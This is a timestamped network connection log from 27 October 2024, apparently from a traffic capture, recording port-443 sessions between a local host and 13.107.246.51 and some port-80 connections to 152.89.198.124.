Oct 27, 2024 17:11:21.973186016 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:21.986083984 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.019720078 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.019789934 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.019929886 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.020153999 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.020154953 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.022167921 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.037698030 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.054677963 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.057780981 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.057838917 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.058207035 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.058224916 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.058417082 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.058450937 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.058749914 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.058765888 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.058924913 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.058948040 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.059232950 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.059243917 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.075295925 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.075295925 CET	57825	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.075326920 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.075351000 CET	443	57825	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.113032103 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.162796021 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.183490038 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.183645964 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.183842897 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.188653946 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.188828945 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.188929081 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.190120935 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.190517902 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.190587044 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.201468945 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.201482058 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.201847076 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.201852083 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.201948881 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.201972008 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.201997042 CET	57827	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.202011108 CET	443	57827	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.280280113 CET	57828	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.280325890 CET	443	57828	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.281707048 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.281707048 CET	57826	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.281754017 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.281778097 CET	443	57826	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.327415943 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.327486992 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.327598095 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.327796936 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.327796936 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.351090908 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.351110935 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.351123095 CET	57829	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.351129055 CET	443	57829	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.353682995 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.353740931 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.353981018 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.355367899 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.355392933 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.355441093 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.355587006 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.355634928 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.357439995 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.357511044 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.357584000 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.357645988 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.357657909 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.357750893 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.357784033 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.358191967 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.358222008 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.358315945 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.358935118 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.358956099 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.359019041 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.359054089 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.359069109 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:22.359146118 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:22.359169006 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.008131981 CET	57824	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:23.008469105 CET	57835	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:23.014431953 CET	80	57824	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:23.014484882 CET	57824	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:23.014492035 CET	80	57835	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:23.014564991 CET	57835	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:23.015571117 CET	57835	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:23.021012068 CET	80	57835	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:23.096196890 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.096451998 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.096661091 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.096682072 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.097109079 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.097116947 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.097395897 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.097423077 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.097799063 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.097805977 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.100332975 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.100758076 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.100841999 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.101063013 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.101089001 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.109884977 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.110191107 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.110198975 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.110575914 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.110580921 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.117824078 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.118262053 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.118273973 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.118578911 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.118582964 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.560673952 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.560734987 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.560812950 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.560864925 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.560875893 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.560926914 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.560951948 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561019897 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561086893 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561111927 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561136007 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.561146021 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561178923 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.561189890 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561235905 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.561275959 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.561296940 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561309099 CET	57831	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.561316013 CET	443	57831	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561454058 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561651945 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.561712027 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.562130928 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.562144995 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.562154055 CET	57833	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.562159061 CET	443	57833	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.563334942 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.563334942 CET	57830	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.563391924 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.563419104 CET	443	57830	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.564332008 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.564367056 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.564392090 CET	57832	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.564409018 CET	443	57832	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.565143108 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.565160036 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.565181971 CET	57834	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.565192938 CET	443	57834	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.567421913 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.567486048 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.567568064 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.568078041 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.568108082 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.572803020 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.572889090 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.572968960 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.573376894 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.573412895 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.574174881 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.574198961 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.574268103 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.578555107 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.578584909 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.578644991 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.579070091 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.579087973 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.579138041 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.579202890 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.579227924 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.579407930 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.579436064 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.579483032 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:23.579493999 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:23.888232946 CET	80	57835	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:23.888441086 CET	57835	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:24.309889078 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.320247889 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.330096006 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.333940029 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.333997965 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.334461927 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.334475040 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.335622072 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.335671902 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.336014986 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.336030960 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.336236000 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.336251020 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.336580992 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.336591005 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.337589979 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.337897062 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.337917089 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.338289022 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.338299990 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.357729912 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.358046055 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.358057976 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.358418941 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.358423948 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.463176012 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.463484049 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.463552952 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.463550091 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.463627100 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.468238115 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.468406916 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.468463898 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.470441103 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.470659018 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.470719099 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.473655939 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.473807096 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.473860979 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.496701956 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.496870995 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.496920109 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.697123051 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.697184086 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.697212934 CET	57838	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.697232962 CET	443	57838	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.699930906 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.699930906 CET	57837	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.699986935 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.700015068 CET	443	57837	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.700653076 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.700670958 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.700706005 CET	57840	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.700711966 CET	443	57840	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.701386929 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.701406956 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.701431036 CET	57836	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.701442957 CET	443	57836	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.702116013 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.702136040 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.702162981 CET	57839	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.702177048 CET	443	57839	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.933856010 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.933916092 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.933986902 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.935395002 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.935414076 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.936085939 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.936119080 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.936180115 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.936285973 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.936300993 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.937730074 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.937741995 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.937803030 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.937896013 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.937937021 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.937983990 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.938371897 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.938422918 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.938491106 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.938690901 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.938692093 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.938707113 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.938709021 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:24.939039946 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:24.939068079 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.509963036 CET	57835	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:25.510425091 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:25.515831947 CET	80	57835	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:25.515918016 CET	57835	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:25.516079903 CET	80	57846	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:25.516156912 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:25.516392946 CET	57846	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:25.525474072 CET	80	57846	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:25.668263912 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.671097040 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.671133041 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.671545982 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.671555042 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.674514055 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.674942017 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.674957037 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.675323009 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.675328970 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.686259031 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.686584949 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.686635017 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.687180996 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.687194109 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.691354036 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.691744089 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.691762924 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.692095041 CET	57841	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.692101955 CET	443	57841	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.696353912 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.696824074 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.696877956 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.697216988 CET	57844	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.697228909 CET	443	57844	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.798430920 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.798491001 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.798543930 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.798953056 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.798975945 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.798989058 CET	57843	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.798998117 CET	443	57843	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.801429987 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.801491022 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.801613092 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.801815987 CET	57847	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.801846027 CET	443	57847	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.807590008 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.807734966 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.807840109 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.807840109 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.807883978 CET	57842	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.807894945 CET	443	57842	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.809799910 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.809904099 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.809973955 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.810102940 CET	57848	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.810137033 CET	443	57848	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.820893049 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.820967913 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.821026087 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.821046114 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.821077108 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.821110964 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.821110964 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.821141958 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.821170092 CET	57845	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.821183920 CET	443	57845	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.823043108 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.823128939 CET	443	57849	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:25.823282003 CET	57849	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:25.823419094 CET	57849	443	192.168.2.4	13.107.246.51
